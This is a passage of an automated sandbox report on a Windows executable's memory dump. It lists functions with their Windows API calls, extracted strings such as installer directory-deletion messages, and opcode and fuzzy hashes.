ImageList_DrawEx.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,?,?), ref: 0046C3BC
SetTextColor.GDI32(00000000,00FFFFFF), ref: 0046C409
SetBkColor.GDI32(00000000,00000000), ref: 0046C411
BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 0046C436

Part of subcall function 0046C294: ImageList_GetBkColor.COMCTL32(00000000,?,0046C2F5,00000000,?), ref: 0046C2AA

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorImageList_$Draw$Text
String ID:
API String ID: 2027629008-0
Opcode ID: e5902e12248b077f5dcf303b7e502621638e328100d3871dcddeedb462ad1493
Instruction ID: 0572dc63e4f83b290eea8cf668f5d6a7550ba7143290c0555269fa3e812d361c
Opcode Fuzzy Hash: e5902e12248b077f5dcf303b7e502621638e328100d3871dcddeedb462ad1493
Instruction Fuzzy Hash: EB512B71701105AFCB40EFAACDC2F9E37ACAF08314F54115AB904EB296CA78EC418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004B55E8, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,004B576C,?,00000000,?), ref: 004B56AE

Part of subcall function 004AECF0: FindClose.KERNEL32(000000FF,004AEDE5), ref: 004AEDD4

Strings

Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004B5688
Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 004B5725
Deleting directory: %s, xrefs: 004B5637
Stripped read-only attribute., xrefs: 004B5670
Failed to delete directory (%d)., xrefs: 004B5746
Failed to strip read-only attribute., xrefs: 004B567C
Failed to delete directory (%d). Will retry later., xrefs: 004B56C7

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseErrorFindLast
String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
API String ID: 754982922-1448842058
Opcode ID: 5a8379ef977662508e7ecac7cc09e77d4cabd2f239c4712d6298e36cd68c0f64
Instruction ID: a9663ac9cb91e778f4acd9085cc6da21d10970a72d262db760f8853ea0a8091c
Opcode Fuzzy Hash: 5a8379ef977662508e7ecac7cc09e77d4cabd2f239c4712d6298e36cd68c0f64
Instruction Fuzzy Hash: C541D330B04A049ACB01EB6E89413EEF7E5AF49318F50857BA41597391DFBC8D05877E

Uniqueness

Uniqueness Score: -1.00%

Function 0047C01C, Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 0047C042
IsWindowUnicode.USER32(00000000), ref: 0047C085
SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 0047C0A0
SendMessageA.USER32(00000000,-0000BBEE,00000000,00000000), ref: 0047C0BF
GetWindowThreadProcessId.USER32(00000000), ref: 0047C0CE
GetWindowThreadProcessId.USER32(?,?), ref: 0047C0DF
SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 0047C0FF

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$ProcessThread$CaptureUnicode
String ID:
API String ID: 1994056952-0
Opcode ID: 5ad7e739a11c1de0ba7bd1ff9b3dec43e2974d157b62f9ac315e289ccf3a9b78
Instruction ID: 61dab7ecd4aef365e16f5b47f15cac0b2b796b678c0681677c6b1ce3be4e1523
Opcode Fuzzy Hash: 5ad7e739a11c1de0ba7bd1ff9b3dec43e2974d157b62f9ac315e289ccf3a9b78
Instruction Fuzzy Hash: 02211E71204649AFD760EAA9CD81FA773DCDB14314B14C83EF95ED7283D629EC4087A9

Uniqueness

Uniqueness Score: -1.00%

Function 00432E94, Relevance: 12.1, APIs: 8, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00432EC2
GetDeviceCaps.GDI32(?,00000068), ref: 00432EDE
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00432EFD
GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 00432F21
GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 00432F3F
GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 00432F53
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00432F73
ReleaseDC.USER32 ref: 00432F8B

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: EntriesPaletteSystem$CapsDeviceRelease
String ID:
API String ID: 1781840570-0
Opcode ID: b792980786c42040da24eeb03558754ace334723f50328ca1c6c73013d4e6fa9
Instruction ID: 0fb3abe7e5a41bd5da015c9731a084f43fd291a6ac1a4f8aaa109c0561839734
Opcode Fuzzy Hash: b792980786c42040da24eeb03558754ace334723f50328ca1c6c73013d4e6fa9
Instruction Fuzzy Hash: 382186B1A00218AADB10DBA9CD81FAE73BCEB4C708F5004A6F704F71D1D6799E409B28

Uniqueness

Uniqueness Score: -1.00%

Function 00402088, Relevance: 10.9, APIs: 7, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15e564b932a5f1a7030e953fdf53f5065d19ad7c6e59cc17798857a132f335c3
Instruction ID: 3a69dfe832a6f357556f7e76a11f9f7263626d9ba2b87e85491605003e011a55
Opcode Fuzzy Hash: 15e564b932a5f1a7030e953fdf53f5065d19ad7c6e59cc17798857a132f335c3
Instruction Fuzzy Hash: 28C134727006004BD715AABD9D8936EB3869BC4325F18827FF604EB3E6DABCDC458758

Uniqueness

Uniqueness Score: -1.00%

Function 004029CC, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 277windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32 ref: 00402DA1

Strings

, xrefs: 00402CDA
7, xrefs: 00402B44
,jP, xrefs: 00402AAB
,jP, xrefs: 00402A1E
n P, xrefs: 00402B4E

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Message
String ID: $,jP$,jP$7$n P
API String ID: 2030045667-1149660803
Opcode ID: af57426f23213b8dafdb8b48d17e070b8e70ace6ae1fa87f6a3311ab6e865782
Instruction ID: 416763a972b0038aff62a10e2b51163af9df47803db5e931e0c8ac85ecf44bce
Opcode Fuzzy Hash: af57426f23213b8dafdb8b48d17e070b8e70ace6ae1fa87f6a3311ab6e865782
Instruction Fuzzy Hash: D0B19330B042648BDB21EB2DCD88B9D77E4AB19304F1441FAE449E73D2DBB89D85CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004655D8, Relevance: 10.7, APIs: 7, Instructions: 224COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00465875), ref: 0046576D
GetTickCount.KERNEL32 ref: 00465772

Part of subcall function 0045A758: KiUserCallbackDispatcher.NTDLL(?,00000000,?,?,004C4A09,0000000C), ref: 0045A76B

SystemParametersInfoW.USER32 ref: 004657D1
SystemParametersInfoW.USER32 ref: 004657E9
AnimateWindow.USER32(00000000,00000064,?), ref: 0046582E
ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00465875), ref: 0046583F
GetTickCount.KERNEL32 ref: 0046585C

Part of subcall function 00468FC4: GetCursorPos.USER32(?,00000000,00465805,00001018,00000000,00000000,00000000,00001016,00000000,?,00000000,00000000,000000FF,?,?,?), ref: 00468FC8

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountInfoParametersSystemTick$AnimateCallbackCursorDispatcherShowUser
String ID:
API String ID: 1093677395-0
Opcode ID: babf8310f1608d2e9661fef31f93464ab1ec14505b0c6fce6d6652304dddcac8
Instruction ID: e997385fbbed9d50ae99d5e92f9fbd2ef5f0a51a6e024e9dd257720e51baa724
Opcode Fuzzy Hash: babf8310f1608d2e9661fef31f93464ab1ec14505b0c6fce6d6652304dddcac8
Instruction Fuzzy Hash: FA8150746006049FDB10EF69C885A9EB7F5AF48304F1088BAF445EB352EB79ED45CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0044DDFC, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 217windowCOMMON

Download Yara Rule

APIs

InsertMenuItemW.USER32(?,000000FF,000000FF,00000030), ref: 0044E012

Part of subcall function 0044E388: CreateMenu.USER32(?,0044E28B,?,?,00000000,?,0044E213,?,00453545,004764A0), ref: 0044E3B3

GetVersion.KERNEL32(00000000,0044E0C4), ref: 0044DE99

Part of subcall function 0044E388: CreatePopupMenu.USER32(?,0044E28B,?,?,00000000,?,0044E213,?,00453545,004764A0), ref: 0044E3A6

InsertMenuW.USER32(?,000000FF,00000000,00000000,00000000), ref: 0044E085
InsertMenuW.USER32(?,000000FF,00000000,?,00000000), ref: 0044E0A1

Strings

?, xrefs: 0044DECA
,, xrefs: 0044DEC3

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Insert$Create$ItemPopupVersion
String ID: ,$?
API String ID: 2359071979-2308483597
Opcode ID: 0b916a9719fc6844f23f4e682ebe6d2f59231ec73e720443bc127fb6521308d1
Instruction ID: bba3e7d28215330a891b0f6e6139d6a9adac1eccde4b56bc24ff52f653770e97
Opcode Fuzzy Hash: 0b916a9719fc6844f23f4e682ebe6d2f59231ec73e720443bc127fb6521308d1
Instruction Fuzzy Hash: 7B811130A00255AFEB60DF6AC980AAEB7F5BB05304F14406BF550E7792D378ED29DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004AE5E8, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 216COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004AE6CE

Strings

WININIT.INI, xrefs: 004AE67C
.tmp, xrefs: 004AE68A
[rename], xrefs: 004AE732, 004AE76E
MoveFileEx, xrefs: 004AE8E4
NUL, xrefs: 004AE791

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringWrite
String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
API String ID: 390214022-3304407042
Opcode ID: 575aad07d41668fa2da89294c41122e41f90534e36e2731da6017657addd59c2
Instruction ID: 4f9e6d17b67b38806c5b220eb31912b83165e38f549e9769f448a7a62be43be8
Opcode Fuzzy Hash: 575aad07d41668fa2da89294c41122e41f90534e36e2731da6017657addd59c2
Instruction Fuzzy Hash: 29814174A002089FDF10EB96C882BDEB7B5EF5A308F50846AF91077391D779AD45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0047C868, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0047DD18: GetActiveWindow.USER32 ref: 0047DD3F
Part of subcall function 0047DD18: GetLastActivePopup.USER32(00000001), ref: 0047DD54

GetWindowRect.USER32 ref: 0047C8F3
SetWindowPos.USER32(00000001,00000000,?,?,00000000,00000000,0000001D,00000001,?), ref: 0047C92E
MessageBoxW.USER32(00000000,00000000,00000000,00000000), ref: 0047C96D
SetWindowPos.USER32(00000001,00000000,?,?,00000000,00000000,0000001D,0047C9E6,00000000,00000000,0047C9DF), ref: 0047C9C0
SetActiveWindow.USER32(00000000,0047C9E6,00000000,00000000,0047C9DF), ref: 0047C9D1

Strings

(, xrefs: 0047C8CD

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Active$LastMessagePopupRect
String ID: (
API String ID: 3456420849-3887548279
Opcode ID: fa75f0bdfde83538865df9954d0c08030aba0eca107084773cca47bfd52dbd04
Instruction ID: c27aebf2684b8ea1a1d832875631c6833832f8515d49a28bf35c7c281aaff68a
Opcode Fuzzy Hash: fa75f0bdfde83538865df9954d0c08030aba0eca107084773cca47bfd52dbd04
Instruction Fuzzy Hash: 9D51EAB5A00208EFDB44DBA9C885FEEB7B5FB48304F148569F608E7395D674AD018B54

Uniqueness

Uniqueness Score: -1.00%

Function 004585C4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 136threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00458A04: WindowFromPoint.USER32(-000000F4,?,?,004585DE,?,-0000000C,?), ref: 00458A0A
Part of subcall function 00458A04: GetParent.USER32(00000000), ref: 00458A21

GetWindow.USER32(00000000,00000004), ref: 004585E6
GetCurrentThreadId.KERNEL32 ref: 004586BD
EnumThreadWindows.USER32(00000000,00458564,?), ref: 004586C3
GetWindowRect.USER32 ref: 004586DA

Part of subcall function 00457870: GetWindowThreadProcessId.USER32(00000000), ref: 0045787D
Part of subcall function 00457870: GetCurrentProcessId.KERNEL32(?,00000000,00000000,0047DF65,?,00000000,?,00000001,0047C338,?,00000000,00000200,0000020A,00000001), ref: 00457886
Part of subcall function 00457870: GlobalFindAtomW.KERNEL32(00000000), ref: 0045789B
Part of subcall function 00457870: GetPropW.USER32 ref: 004578B2

Strings

(GE, xrefs: 00458704
0bE, xrefs: 0045867D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Thread$CurrentProcess$AtomEnumFindFromGlobalParentPointPropRectWindows
String ID: (GE$0bE
API String ID: 349414421-3107333291
Opcode ID: 864bf6e9cc94a70677e982c06787cfa8a614b0d458c44790ed8d3fdb53f0a2ed
Instruction ID: ae17b4ad0763dcafad620fef69102b15d0ee6fbcb9dfe3275e0567b889308847
Opcode Fuzzy Hash: 864bf6e9cc94a70677e982c06787cfa8a614b0d458c44790ed8d3fdb53f0a2ed
Instruction Fuzzy Hash: 29513D70A002099FCB00DFA9C885AAEB7B4BB48345F10456AEC55EB393DB78DD49CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0043682C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004368E8
CreateHalftonePalette.GDI32(00000000,00000000), ref: 004368F5
ReleaseDC.USER32 ref: 00436904
DeleteObject.GDI32(00000000), ref: 00436972

Strings

(, xrefs: 0043689F
dB, xrefs: 00436865

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDeleteHalftoneObjectPaletteRelease
String ID: ($dB
API String ID: 577518360-404104738
Opcode ID: ed5a40e957989e5db676064f8f038284e2d75d5f3da43bad8518e490be35cdd0
Instruction ID: e5af28e37cbb7155dac159f6ba2d2ded8c8a3d7b18243e6f7da2e6a0b919c287
Opcode Fuzzy Hash: ed5a40e957989e5db676064f8f038284e2d75d5f3da43bad8518e490be35cdd0
Instruction Fuzzy Hash: FF41D7B0A04209EFDB04DFA5C445B9EFBF6EF4D308F1180AAE404A73A1D6785E45DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004A6F64, Relevance: 10.6, APIs: 7, Instructions: 110COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000014), ref: 004A6FA7
SetTextColor.GDI32(00000000,00000000), ref: 004A6FBF
DrawTextW.USER32(00000000,00000000,?,?,?), ref: 004A6FF5
GetSysColor.USER32(00000010), ref: 004A7009
SetTextColor.GDI32(00000000,00000000), ref: 004A7021
DrawTextW.USER32(?,00000000,?,?,?), ref: 004A7057
DrawTextW.USER32(?,00000000,?,?,?), ref: 004A708F

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$Color$Draw
String ID:
API String ID: 2775849416-0
Opcode ID: fc2fa7a8644dc9eba060bbbfb44e4c79525fc061634a567f524af734156458fa
Instruction ID: 01b4ed0c867c6265f7320c1f1695f9e5371b593b58d257530a6a66c4cb13c165
Opcode Fuzzy Hash: fc2fa7a8644dc9eba060bbbfb44e4c79525fc061634a567f524af734156458fa
Instruction Fuzzy Hash: C2316475701104AFC740EF6EC889D9AB7F8AF48314F15817AF918DB3A2C674EE048B54

Uniqueness

Uniqueness Score: -1.00%

Function 004C8E08, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104sleepCOMMON

Download Yara Rule

APIs

GetCursor.USER32 ref: 004C8EDF
LoadCursorW.USER32(00000000,00007F02), ref: 004C8EED
SetCursor.USER32(00000000,00000000,00007F02), ref: 004C8EF3
Sleep.KERNEL32(000002EE,00000000,00000000,00007F02), ref: 004C8EFD
SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02), ref: 004C8F03

Strings

CheckPassword, xrefs: 004C8E80

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$LoadSleep
